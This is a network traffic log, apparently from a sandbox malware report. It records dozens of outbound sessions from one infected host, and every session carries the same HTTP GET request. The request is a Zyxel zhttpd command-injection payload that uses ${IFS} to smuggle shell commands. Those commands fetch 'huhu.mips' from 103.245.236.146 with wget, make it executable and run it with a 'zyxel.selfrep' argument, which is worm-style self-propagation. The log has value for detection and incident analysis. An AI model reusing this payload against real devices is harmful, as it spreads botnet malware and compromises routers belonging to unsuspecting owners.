                                              Jan 29, 2024 07:04:09.392199993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9231192.168.2.143978475.66.219.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392251968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9232192.168.2.1442464194.159.148.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392290115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9233192.168.2.1449514173.27.111.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392302990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9234192.168.2.1433434210.202.159.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392362118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9235192.168.2.145453617.220.235.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392395020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9236192.168.2.1460320177.56.116.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392437935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9237192.168.2.145795219.90.165.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392468929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9238192.168.2.145312494.228.182.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392493963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9239192.168.2.1439750115.244.182.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392532110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9240192.168.2.1451976177.59.89.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392577887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9241192.168.2.1433090157.249.196.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392616034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9242192.168.2.1444884139.202.15.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392663002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9243192.168.2.144629642.226.194.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392705917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9244192.168.2.1445886104.57.221.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392740011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9245192.168.2.145112677.79.94.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392781019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9246192.168.2.1436928158.202.207.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392818928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9247192.168.2.1454322141.236.226.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392853022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9248192.168.2.1439428167.111.66.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392894030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9249192.168.2.143444486.120.207.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392936945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9250192.168.2.1457170108.165.145.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.392986059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9251192.168.2.143786493.142.23.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393014908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9252192.168.2.1456192175.0.241.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393064022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9253192.168.2.144135273.242.179.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393085003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9254192.168.2.1437172188.241.236.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393120050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9255192.168.2.1436706163.34.36.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393146992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9256192.168.2.144278673.150.48.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393176079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9257192.168.2.1455114154.248.235.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393235922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9258192.168.2.1450354207.238.179.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393285036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9259192.168.2.143781644.228.172.135443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393326998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9260192.168.2.1449984120.84.31.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393353939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9261192.168.2.144299847.8.97.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393395901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9262192.168.2.1436820197.118.112.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393448114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9263192.168.2.1433452157.236.43.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393496037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9264192.168.2.1437868171.200.30.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393520117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9265192.168.2.1451096135.46.233.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393560886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9266192.168.2.145542874.3.41.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393598080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9267192.168.2.1450088210.130.89.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393659115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9268192.168.2.143703657.116.139.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393677950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9269192.168.2.144176896.25.33.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393732071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9270192.168.2.1445118176.172.92.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393768072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9271192.168.2.145562665.174.191.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393829107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9272192.168.2.145076849.153.237.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393877029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9273192.168.2.1453934179.33.120.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393918991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9274192.168.2.145719018.170.225.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.393969059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9275192.168.2.1449258153.91.154.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394051075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9276192.168.2.1447196197.102.135.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394082069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9277192.168.2.1448338221.146.75.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394113064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9278192.168.2.1447840146.223.138.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394143105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9279192.168.2.14537324.191.38.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394205093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9280192.168.2.145127883.137.70.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394263029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9281192.168.2.144900032.121.147.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394304991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9282192.168.2.1460500128.165.104.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394329071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9283192.168.2.143586662.48.203.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394382000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9284192.168.2.1440178147.210.36.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394406080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9285192.168.2.1444200111.43.253.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.394445896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9286192.168.2.144787499.137.221.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.398020983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9287192.168.2.1433756169.79.72.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.398037910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9288192.168.2.144683492.230.35.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.398087025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9289192.168.2.145335240.3.120.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.398122072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9290192.168.2.145128840.225.234.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.398161888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9291192.168.2.1436578178.147.36.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.398191929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9292192.168.2.1452124171.198.217.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:09.398222923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9293192.168.2.1439350186.120.7.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:10.406399965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9294192.168.2.1437782153.84.186.140443
                                              TimestampBytes transferredDirectionData
